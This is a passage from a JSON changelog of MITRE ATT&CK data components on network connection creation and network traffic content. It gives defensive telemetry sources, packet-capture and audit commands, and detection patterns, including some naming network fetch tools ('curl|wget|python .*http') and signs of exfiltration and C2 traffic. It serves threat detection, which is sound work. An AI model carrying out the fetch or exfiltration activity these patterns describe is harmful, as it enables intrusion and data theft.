class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;following&nbsp;application&nbsp;installation&nbsp;&nbsp;Collection&nbsp;Methods&nbsp;&nbsp;-&nbsp;M</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">obile&nbsp;VPN&nbsp;telemetry&nbsp;-&nbsp;Secure&nbsp;web&nbsp;gateway&nbsp;logs&nbsp;-&nbsp;Network&nbsp;dete</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ction&nbsp;and&nbsp;response&nbsp;(NDR)&nbsp;-&nbsp;Mobile&nbsp;EDR&nbsp;network&nbsp;monitoring&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-04-23 18:37:33.992000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0082",
                            "external_id": "DC0082"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Network Connection Creation",
                    "description": "The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.\n\n*Data Collection Measures:*\n\n- Windows:\n    - Event ID 5156 \u2013 Filtering Platform Connection - Logs network connections permitted by Windows Filtering Platform (WFP).\n    - Sysmon Event ID 3 \u2013 Network Connection Initiated - Captures process, source/destination IP, ports, and parent process.\n- Linux/macOS:\n    - Netfilter (iptables), nftables logs - Tracks incoming and outgoing network connections.\n    - AuditD (`connect` syscall) - Logs TCP, UDP, and ICMP connections.\n    - Zeek (`conn.log`) - Captures protocol, duration, and bytes transferred.\n- Cloud & Network Infrastructure:\n    - AWS VPC Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the network level in cloud environments.\n    - Zeek (conn.log) or Suricata (network events) - Captures packet metadata for detection and correlation.\n- Endpoint Detection & Response (EDR):\n    - Detect anomalous network activity such as new C2 connections or data exfiltration attempts.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "NSM:Flow",
                            "channel": "log entries indicating network connection initiation on macOS"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "connect"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execs of chromium, google-chrome, firefox, libreoffice with http(s) in cmdline"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "connect/sendto"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "open or connect syscalls on /tmp/ssh-* or $SSH_AUTH_SOCK"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/connect with TLS context by unexpected process"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/bind: New bind() to a previously closed port shortly after the sequence."
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "sendto/connect"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "outbound connections"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/bind: Process binds to a new local port shortly after knock"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/connect calls showing SSH processes forwarding arbitrary ports"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "openat,connect -k discovery"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Outbound connection to 169.254.169.254 from EC2 workload"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Large transfer volume (>20MB) from RDS IP range to external public IPs"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "High outbound traffic from new region resource"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Outbound connections to port 22, 3389"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Traffic observed on mirror destination instance"
                        },
                        {
                            "name": "cni:netflow",
                            "channel": "outbound connection to internal or external APIs"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "socket connect"
                        },
                        {
                            "name": "esxi:esxupdate",
                            "channel": "/var/log/esxupdate.log or /var/log/vmksummary.log"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "System service interactions"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Service initiated connections"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Service-Based Network Connection"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "protocol egress"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "network activity"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "None"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "network session initiation with external HTTPS services"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "family=AF_PACKET or protocol raw; process name not in allowlist."
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "network"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "postfix/smtpd"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "New Wi-Fi connection established or repeated association failures"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "None"
                        },
                        {
                            "name": "linux:Sysmon",
                            "channel": "EventCode=3, 22"
                        },
                        {
                            "name": "macos:endpointsecurity",
                            "channel": "ES_EVENT_TYPE_NOTIFY_CONNECT"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events/socket_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "execution of trusted tools interacting with external endpoints"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd or network_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events + launchd"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "process_events, socket_events"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "CONNECT: Long-lived connections from remote-control parents to external IPs/domains"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "connection attempts"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "connection open"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network connection events"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "First outbound connection from the same PID/user shortly after an inbound trigger."
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network sessions initiated by remote desktop apps"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Inbound connections to VNC/SSH ports"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Outbound Traffic"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "networkd or socket"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream network activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Association and authentication events including failures and new SSIDs"
                        },
                        {
                            "name": "Network",
                            "channel": "None"
                        },
                        {
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "name": "networkdevice:Flow",
                            "channel": "Traffic from mirrored interface to mirror target IP"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Dynamic route changes"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "web domain alerts"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "New outbound connection from Safari/Chrome/Firefox/Word"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Outbound connections from newly spawned child processes or from the browser to uncommon endpoints or on anomalous ports"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Outbound connection after script or installer launch"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "Outbound Connections"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "proxy or TLS inspection logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New TCP/443 or TCP/80 to domain not previously seen for the user/host"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound connection to *.tunnels.api.visualstudio.com or *.devtunnels.ms"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Connections to *.devtunnels.ms or tunnels.api.visualstudio.com"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTPs connection to tunnels.api.visualstudio.com"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound or inbound TFTP file transfers of ROMMON or firmware binaries"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection: TCP connections to ports 139/445 to multiple hosts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection: SMB connections to multiple internal hosts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound HTTP/S initiated by newly installed interpreter process"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "outbound connections to RMM services or to unusual destination ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Multiple failed connections (conn_state=REJ/S0 or history has 'R') across distinct ports from the same src_ip followed by success to a specific port."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Sequence of REJ/S0 then SF success from same src_ip within TimeWindow."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Series of denied/closed flows to distinct ports then success to mgmt port from same src_ip within TimeWindow."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound traffic spike through formerly blocked ports/subnets following config change"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New egress to Internet by the same UID/host shortly after terminal exec"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection: Inbound connections to SSH or VPN ports"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "External access to container ports (2375, 6443)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "remote access"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound Connections"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection attempts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "High-volume or repeated SNMP GETBULK/GETNEXT queries from untrusted or external IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "outbound connections from host during or immediately after image build"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "new outbound connection from browser/office lineage"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "new outbound connection from exploited lineage"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Multiple failed connections to closed ports (history contains 'R' or conn_state in {REJ, S0}) followed by a successful handshake to a new port from same src within TimeWindowKnock"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Closed-port hits followed by success from same src_ip"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Port-knock pattern from one src to device unicast,broadcast,network addresses on same port within TimeWindowKnock"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected inbound/outbound TFTP traffic for device image files"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected or unauthorized inbound connections to SNMP, NETCONF, or RESTCONF services"
                        },
                        {
                            "name": "snmp:access",
                            "channel": "GETBULK/GETNEXT requests for OIDs associated with configuration parameters"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Bits-Client/Operational",
                            "channel": "BITS job lifecycle events such as job create/modify/transfer/complete and URL/remote name fields"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-WLAN-AutoConfig",
                            "channel": "EventCode=8001, 8002, 8003"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=5156, 5157"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=3, 22"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=8001"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 18:37:33.992000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"NSM:Flow\", \"channel\": \"log entries indicating network connection initiation on macOS\"}, \"root['x_mitre_log_sources'][53]\": {\"name\": \"Network\", \"channel\": \"None\"}, \"root['x_mitre_log_sources'][60]\": {\"name\": \"NSM:Connections\", \"channel\": \"Outbound connection after script or installer launch\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-04-22 14:48:50.367000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0085",
                            "external_id": "DC0085"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Network Traffic Content",
                    "description": "The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.\n\n*Data Collection Measures:*\n\n- Network Packet Capture (Full Content Logging)\n    - Wireshark / tcpdump / tshark\n        - Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`\n    - Zeek (formerly Bro)\n        - Extracts protocol headers and payload details into structured logs. `echo \"redef Log::default_store = Log::ASCII;\" > local.zeek | zeek -Cr capture.pcap local.zeek`\n    - Suricata / Snort (IDS/IPS with PCAP Logging)\n        - Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`\n- Host-Based Collection\n    - Sysmon Event ID 22 \u2013 DNS Query Logging, Captures DNS requests made by processes, useful for detecting C2 domains.\n    - Sysmon Event ID 3 \u2013 Network Connection Initiated, Logs process-to-network connection relationships.\n    - AuditD (Linux) \u2013 syscall=connect, Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`\n- Cloud & SaaS Traffic Collection\n    - AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs, Captures metadata about inbound/outbound network traffic.\n    - Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle), Detects malicious activity in cloud environments by analyzing network traffic patterns.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Traffic",
                            "channel": "None"
                        },
                        {
                            "name": "ALB:HTTPLogs",
                            "channel": "AWS ALB/ELB/GCP/Azure Application Gateway HTTP logs with unusual methods, long URIs, serialized payloads, 4xx/5xx bursts"
                        },
                        {
                            "name": "apache:access_log",
                            "channel": "Unusual HTTP POST or PUT requests to paths such as '/uploads/', '/admin/', or CMS plugin folders"
                        },
                        {
                            "name": "API:ConfigRepoAudit",
                            "channel": "Access to configuration repository endpoints, unusual enumeration requests or mass downloads"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "setsockopt, ioctl modifying ARP entries"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Traffic between instances"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Large volume of malformed or synthetic payloads to application endpoints prior to failure"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "Unusual volume of data transferred from S3 storage endpoints to non-corporate IPs"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "High volume internal-to-internal IP transfer or cross-account cloud transfer"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "networkInsightsLogs"
                        },
                        {
                            "name": "azure:vpcflow",
                            "channel": "HTTP requests to 169.254.169.254 or Azure Metadata endpoints"
                        },
                        {
                            "name": "container:proxy",
                            "channel": "outbound/inbound network activity from spawned pods"
                        },
                        {
                            "name": "docker:events",
                            "channel": "remote API calls to /containers/create or /containers/{id}/start"
                        },
                        {
                            "name": "docker:stats",
                            "channel": "unusual network TX/RX byte deltas"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "Process within container accesses link-local address 169.254.169.254"
                        },
                        {
                            "name": "EDR:hunting",
                            "channel": "Advanced Hunting: DeviceProcessEvents + DeviceNetworkEvents"
                        },
                        {
                            "name": "esxcli:network",
                            "channel": "Socket sessions with randomized payloads inconsistent with TLS"
                        },
                        {
                            "name": "esxcli:network",
                            "channel": "listening sockets bound to non-standard ports"
                        },
                        {
                            "name": "esxcli:network",
                            "channel": "listening sockets bound with non-standard encapsulated protocols"
                        },
                        {
                            "name": "esxcli:network",
                            "channel": "Socket inspection showing RSA key exchange outside baseline endpoints"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Network activity"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Outbound traffic using encoded payloads post-login"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "HTTPS POST connections to webhook endpoints"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Inspection of sockets showing encrypted sessions from non-baseline processes"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "HTTPS POST connections to pastebin-like domains"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "network stack module logs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Suspicious traffic filtered or redirected by VM networking stack"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "VMCI syslog entries"
                        },
                        {
                            "name": "esxi:vob",
                            "channel": "NFS/remote access logs"
                        },
                        {
                            "name": "etw:Microsoft-Windows-NDIS-PacketCapture",
                            "channel": "TLS Handshake/Network Flow"
                        },
                        {
                            "name": "etw:Microsoft-Windows-WinINet",
                            "channel": "HTTPS Inspection"
                        },
                        {
                            "name": "etw:Microsoft-Windows-WinINet",
                            "channel": "WinINet API telemetry"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "network.query*"
                        },
                        {
                            "name": "gcp:vpcflow",
                            "channel": "first 5m egress to unknown ASNs"
                        },
                        {
                            "name": "IDS:TLSInspection",
                            "channel": "Malformed certs, incomplete asymmetric handshakes, or invalid CAs"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Per-app VPN flow logging indicating opaque/archived payload transfer preceding local decode"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "Per-App VPN flow with code-like content types (application/octet-stream, application/zip, text/javascript, application/x-mach-o)"
                        },
                        {
                            "name": "iOS:unifiedlog",
                            "channel": "WKWebView navigation to domain visually similar to target brand (IDN/punycode/alike score)"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Query to suspicious domain with high entropy or low reputation"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "curl|wget|python .*http"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Unexpected SQL or application log entries showing tampered or malformed data"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Integrity mismatch warnings or malformed packets detected"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "DNS response IPs followed by connections to non-standard calculated ports"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Multiple NXDOMAIN responses and high entropy domains"
                        },
                        {
                            "name": "m365:office",
                            "channel": "External HTTP/DNS connection from Office binary shortly after macro trigger"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process + network metrics correlation for bandwidth saturation"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DNS query with pseudo-random subdomain patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network flow"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "curl|osascript.*open location"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem: com.apple.network"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "open URL|clicked link|LSQuarantineAttach"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "None"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Connections to suspicious domains with mismatched certificate or unusual patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "HTTP POST with encoded content in user-agent or cookie field"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Suspicious outbound HTTPS requests to domains flagged as newly registered or untrusted after spearphishing message interaction"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream (subsystem: com.apple.system.networking)"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Encrypted connection with anomalous payload entropy"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Rapid incoming TLS handshakes or HTTP requests in quick succession"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "network, socket, and http logs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "DNS responses followed by connections to ports outside standard ranges"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Persistent outbound traffic to mining domains"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Encrypted session initiation by unexpected binary"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "eventMessage = 'promiscuous'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "outbound HTTPS connections to code repository APIs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "eventMessage = 'open', 'sendto', 'connect'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dns-sd, mDNSResponder, socket activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process + network activity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem=com.apple.WebKit"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "subsystem: com.apple.WebKit or com.apple.WebKit.Networking"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "encrypted outbound traffic carrying unexpected application data"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Persistent outbound connections with consistent periodicity"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "TLS connections with abnormal handshake sequence or self-signed cert"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Web server process initiating outbound TCP connections not tied to normal server traffic"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "outbound TLS connections to cloud storage providers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "outbound HTTPS connections to cloud storage APIs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process, network"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "process = 'ssh' OR eventMessage CONTAINS 'ssh'"
                        },
                        {
                            "name": "Netfilter/iptables",
                            "channel": "Forwarded packets log"
                        },
                        {
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "name": "networkconfig ",
                            "channel": "interface flag PROMISC, netstat | ip link | ethtool"
                        },
                        {
                            "name": "networkdevice:config",
                            "channel": "NAT table modification (add/update/delete rule)"
                        },
                        {
                            "name": "networkdevice:IDS",
                            "channel": "content inspection / PCAP / HTTP body"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "ACL/Firewall rule modification or new route injection"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "config change (e.g., logging buffered, pcap buffers)"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Authentication failures, unexpected community string usage, or unauthorized SNMPv1/v2 requests"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Authentication failures or unusual community string usage in SNMP queries"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Symmetric encryption detected without TLS handshake sequence"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "TLS handshake + HTTP headers"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Abnormal certificate chains or non-standard ports carrying TLS"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Unusual POST requests to admin or upload endpoints"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns"
                        },
                        {
                            "name": "NSM:Content",
                            "channel": "SSL Certificate Metadata"
                        },
                        {
                            "name": "NSM:Content",
                            "channel": "HTTP Header Metadata"
                        },
                        {
                            "name": "NSM:Content",
                            "channel": "TLS Fingerprint and Certificate Analysis"
                        },
                        {
                            "name": "NSM:Content",
                            "channel": "Traffic on RPC DRSUAPI"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "TLS/HTTP inspection"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "High rate of inbound TCP SYN or ACK packets with missing 3-way handshake completion"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "Anomalous TCP SYN or ACK spikes from specific source or interface"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "Outbound encrypted traffic"
                        },
                        {
                            "name": "NSM:Firewall",
                            "channel": "ICMP/UDP protocol anomaly"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "mqtt.log / xmpp.log (custom log feeds)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "mqtt.log or AMQP custom log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "mqtt.log, xmpp.log, amqp.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP/UDP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TCP session tracking"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Captured packet payloads"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "session behavior"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "External C2 channel over TLS"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http/file-xfer: Inbound/outbound transfer of ELF shared objects"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, files.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "unexpected network activity initiated shortly after shell session starts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP/WebDAV requests that contain NTLMSSP or PROPFIND/MOVE/OPTIONS with Authorization: NTLM"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SPAN or port-mirrored HTTP/S"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, ssl.log, websocket.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Browser connections to known C2 or dynamic DNS domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Session History Reset"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP "
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "query: High-volume LDAP traffic with filters targeting groupPolicyContainer attributes"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP/TLS Logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious URL patterns, uncommon TLDs, short-lived domains, URL shorteners; HTTP method GET/POST"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious URL patterns, uncommon TLDs, URL shorteners"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious GET/POST; downloader patterns"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SSH logins or scp activity"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "remote login and transfer"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious long-lived or reattached remote desktop sessions from unexpected IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP payloads with SQLi/LFI/JNDI/deserialization indicators"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "outbound egress from web host after suspicious request"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Requests towards cloud metadata or command & control from pod IPs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Connections to TCP 427 (SLP) or vCenter web services from untrusted sources"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "NetFlow/sFlow for odd egress to Internet from mgmt plane"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "packet capture or DPI logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SMB2_LOGOFF/SMB_TREE_DISCONNECT"
                        },
                        {
